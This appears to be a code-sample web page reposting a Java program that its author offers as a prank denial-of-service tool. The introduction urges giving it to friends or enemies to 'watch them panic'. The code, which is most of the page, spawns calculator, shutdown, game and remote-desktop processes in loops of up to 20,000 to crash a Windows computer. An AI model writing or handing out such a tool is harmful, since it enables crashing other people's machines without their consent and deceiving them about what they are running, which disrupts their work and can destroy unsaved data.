SystemErrorOwnsYou—
This is a tool I created to put your freinds or enemies under Denial of service conditions-
Dont worry… this tool will not have any long lasting effect, in-fact once you re-boot you
computer it will be in the exact same state as it was before you ran the application.
All it basically does (if you cant understand the source) is loop variouse windows applications
causing your computer to crash (: so dont be lame and give it your little sister or something
give it to a computer cockey freind or one of your enemies and watch them panic.
Again Makesure that you extract the files, and show extracted files in order for the executable application to work!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 | /******************************************************* * MYCPLUS Sample Code - https://www.mycplus.com * * * * This code is made available as a service to our * * visitors and is provided strictly for the * * purpose of illustration. * * * * Please direct all inquiries to saqib at mycplus.com * *******************************************************/ import java.lang.*; public class SystemErrorOwnsYou //----------------pwnage coded by System error--------give it to your frends or enemies \:--------// { public static void main (String [] args) { try { int i = 1; String command = "C:\\WINDOWS\\system32\\calc.exe"; Process p = Runtime.getRuntime().exec(command); for(i = 0; i <= 50; i ++) Runtime.getRuntime().exec(command); } catch (Exception e) { System.out.println("fatal error"); } try { int i = 1; String command = "C:\\WINDOWS\\system32\\shutdown.exe -i -l -s -r -a -f -m"; Process p = Runtime.getRuntime().exec(command); for(i = 0; i <= 50; i ++) Runtime.getRuntime().exec(command); } catch (Exception e) { System.out.println("fatal error"); } try { int i = 1; String command = "C:\\Program Files\\Windows NT\\Pinball\\PINBALL.EXE"; Process p = Runtime.getRuntime().exec(command); for(i = 0; i <= 50; i ++) Runtime.getRuntime().exec(command); } catch (Exception e) { System.out.println("fatal error"); } try { int i = 1; String command = "C:\\Program Files\\MSN Gaming Zone\\Windows\\Rvsezm.exe"; Process p = Runtime.getRuntime().exec(command); for(i = 0; i <= 50; i ++) Runtime.getRuntime().exec(command); } catch (Exception e) { System.out.println("fatal error"); } try { int i = 1; String command = "C:\\WINDOWS\\system32\\calc.exe"; Process p = Runtime.getRuntime().exec(command); for(i = 0; i <= 200; i ++) Runtime.getRuntime().exec(command); } catch (Exception e) { } System.out.println("fatal error"); try { int i = 1; String command = "C:\\WINDOWS\\system32\\mstsc.exe"; Process p = Runtime.getRuntime().exec(command); for(i = 0; i <= 20000; i ++) Runtime.getRuntime().exec(command); } catch (Exception e) { System.out.println("fatal error"); //----------------pwnage!^^----------------// } } } |